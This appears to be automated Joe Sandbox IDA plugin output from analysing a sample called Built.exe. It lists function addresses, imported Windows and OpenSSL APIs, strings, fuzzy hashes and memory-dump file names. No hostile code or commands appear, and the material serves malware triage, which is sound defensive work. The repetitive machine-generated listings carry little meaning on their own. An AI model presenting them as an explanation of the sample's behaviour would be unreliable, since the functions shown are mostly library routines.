Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 6fc467765ade9874935bc0f7b78c5c82d42c8f3ba605ebb62a0b7e8d01ab5b70
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 86111C26B14B06CAEF00CB60EC552B933A4FB19758F440E31DA6D867A4DF7DD1689782

Function 00007FFDF1441A8C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

00007FFE103011F0.VCRUNTIME140 ref: 00007FFDF148F37C
00007FFE103011F0.VCRUNTIME140 ref: 00007FFDF148F5EE

Strings

..\s\ssl\statem\statem_clnt.c, xrefs: 00007FFDF148F313, 00007FFDF148F651, 00007FFDF148FB2E

Memory Dump Source

Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true

Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd

Similarity

API ID: 00007E103011
String ID: ..\s\ssl\statem\statem_clnt.c
API String ID: 2803769598-1507966698
Opcode ID: bdca41ec7c04a826cd1d36dbe52d2f7b51269d51a5f3c02775a26b1210e1a4b4
Instruction ID: 8a30b87766b97be4a47cb4f2bddc2559f470e06698eb1393b5b25d9272530e95
Opcode Fuzzy Hash: bdca41ec7c04a826cd1d36dbe52d2f7b51269d51a5f3c02775a26b1210e1a4b4
Instruction Fuzzy Hash: 5EC1B372B08B4285EB688F61E460ABD67A9FB847A8F148135DFAD577C9DF3CD1908700

Function 00007FFDF1442004 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

00007FFE103011F0.VCRUNTIME140 ref: 00007FFDF1475412
00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF1475464

Strings

..\s\ssl\ssl_sess.c, xrefs: 00007FFDF147543E, 00007FFDF147555C

Memory Dump Source

Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true

Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd

Similarity

API ID: 00007$E103011
String ID: ..\s\ssl\ssl_sess.c
API String ID: 1116935741-2868363209
Opcode ID: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
Instruction ID: cbf96281fb47a052d0d21b96c9e81491b44055d27b0aec9ad01848994786a30d
Opcode Fuzzy Hash: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
Instruction Fuzzy Hash: 7EC17F3270968286E7648F15E564BA933A8FB84B98F040235EE6D8F7DCDF79E545CB00

Function 00007FF626665B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6266617D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF626661803

_get_daylight.LIBCMT ref: 00007FF626665CA4
_get_daylight.LIBCMT ref: 00007FF626665CB5

Strings

?, xrefs: 00007FF626665C35

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 37800e8361a3dfe703810459f1b1267ab54125d95f0b7731b7bdae98e5dc0b6c
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: 55411922A1868345FF249B25F8423796660FB80BA4F144239EF5D86AD5DE3ED441DF03

Function 00007FFDF10C2743 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF116A592

Strings

%04d%02d%02d%02d%02d%02dZ, xrefs: 00007FFDF116A698
%02d%02d%02d%02d%02d%02dZ, xrefs: 00007FFDF116A6A5

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007
String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
API String ID: 3568877910-2648760357
Opcode ID: 2a3bc1689ddc0f887af3b9ff0742d7664fa732a47decfc4233859a34b1d629f8
Instruction ID: 53da04e26ecd533bc66b5825d1977f7265a4212021ce99b7354ecbbc7df90be8
Opcode Fuzzy Hash: 2a3bc1689ddc0f887af3b9ff0742d7664fa732a47decfc4233859a34b1d629f8
Instruction Fuzzy Hash: F4512D32F186818AE760DB19F450A6AB7A5FB89784F444135EA9D87B99DF3CE8448F00

Function 00007FFDF10C1613 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32 ref: 00007FFDF118685E
getaddrinfo.WS2_32 ref: 00007FFDF118689F

Strings

..\s\crypto\bio\b_addr.c, xrefs: 00007FFDF11868CC, 00007FFDF1186913, 00007FFDF118693F

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: getaddrinfo
String ID: ..\s\crypto\bio\b_addr.c
API String ID: 300660673-2547254400
Opcode ID: a0b5319feac94952a1432a4b762969270d9d630226e0b1293bfa37404cbb0f4b
Instruction ID: 0dc913c1a985d54a33f1dc26db789d960db3f6d68cac31255068395fdeef3281
Opcode Fuzzy Hash: a0b5319feac94952a1432a4b762969270d9d630226e0b1293bfa37404cbb0f4b
Instruction Fuzzy Hash: 6E41B272F1868287E7509B12A460ABA77A4FB85744F508139FA9E43BC9DF3CD845CB40

Function 00007FF626659084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266590B6

Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62664CC15), ref: 00007FF6266590D4

Strings

C:\Users\user\AppData\Local\Temp\Built.exe, xrefs: 00007FF6266590C2

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\Built.exe
API String ID: 3580290477-3074098987
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: c4784340ecc49216068ea27e7b8f106d7242c23d749b736892174fab2a9ed293
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: 5E41BF32A08B6285EF149F25EC821BC27A8FB457C4F454135E94D83B96DE3FE4859B43

Function 00007FF62665CCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF62665CDBF
GetLastError.KERNEL32 ref: 00007FF62665CDE1

Strings

U, xrefs: 00007FF62665CD6B

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 9dd750388ea1ae7e9e0c287f08b9ac49db762c15d189c90301a240ffe146a3b8
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 3941A032B18A82C2DB208F25E8453A9A7A1FB88794F404135EA4DC7B99EF3DD401DB42

Function 00007FFDF10C39B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

00007FFE2002EFC0.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FFDF128E30D

Strings

Filename=, xrefs: 00007FFDF128E282, 00007FFDF128E2F1
..\s\crypto\rand\randfile.c, xrefs: 00007FFDF128E26C, 00007FFDF128E2D0

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: 00007E2002
String ID: ..\s\crypto\rand\randfile.c$Filename=
API String ID: 1750240854-2201148535
Opcode ID: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
Instruction ID: 1ef05e60f0307501cbc17bd80c68f7dd6ca87aac8ee6df6fcf71949840e01f9d
Opcode Fuzzy Hash: 6b3b0f7a3795f012e9ff1fc1ebc767fdf81fc92d56402ad81cac52365df12dad
Instruction Fuzzy Hash: 84317C71B0864682FB20EB55E865AA963A8FF95744F404136EA2D477DDDF3CE508DB00

Function 00007FF62665F628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF62665F668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF62665F6BA

Strings

:, xrefs: 00007FF62665F67E

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: dc68054cd116e748200abaed3056cc6a73184f056bcf99fd2a0917b809896555
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: D821E472A0838286FF209B16D84526E73B1FB84B44F954035DA8C83696DF7EE945DF43

Function 00007FFDF10C3387 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FFDF1189E87
WSAGetLastError.WS2_32 ref: 00007FFDF1189E92

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFDF1189E46, 00007FFDF1189EA8, 00007FFDF1189EC4, 00007FFDF1189EF7

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ErrorLastgetsockname
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 566540725-540685895
Opcode ID: a7a9d23270d94e37348a85efb9068d8d5f36d2912cc69f144dbe1a5ed76ec5ab
Instruction ID: 75731b6400831c0db07851a07a87f8429a6563c99e3c885eb44fe4864504b3e7
Opcode Fuzzy Hash: a7a9d23270d94e37348a85efb9068d8d5f36d2912cc69f144dbe1a5ed76ec5ab
Instruction Fuzzy Hash: 9B21AC72F0850682E710DB61E821AEA67A4FF80319F904135E66C42AE8DF3DE585DB40

Function 00007FF62664FDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF62664FE08
RaiseException.KERNEL32 ref: 00007FF62664FE49

Strings

csm, xrefs: 00007FF62664FE36

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 9f2f6502ed7a1bbb3ad87a2f64282b53d1245c60ec3d8c94ba26d750ce038211
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 25113D32618B8282EB618F15F85026AB7E5FB88B84F584230DF8D47769DF7DD551CB01

Function 00007FF6266607AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266607DC
GetDriveTypeW.KERNEL32 ref: 00007FF62666081C

Strings

:, xrefs: 00007FF626660805

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: 67339ac808a419b7276d4cba451acde03c84c3de1b5988d905cdff8cbac04b00
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 4B01442291C28385FF209F60A8662BE77A0FF85748F840036D54DC6691DF2EE554EF17

Function 00007FFDF10C6BE5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFDF118A042
WSAGetLastError.WS2_32 ref: 00007FFDF118A04E

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFDF118A064

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

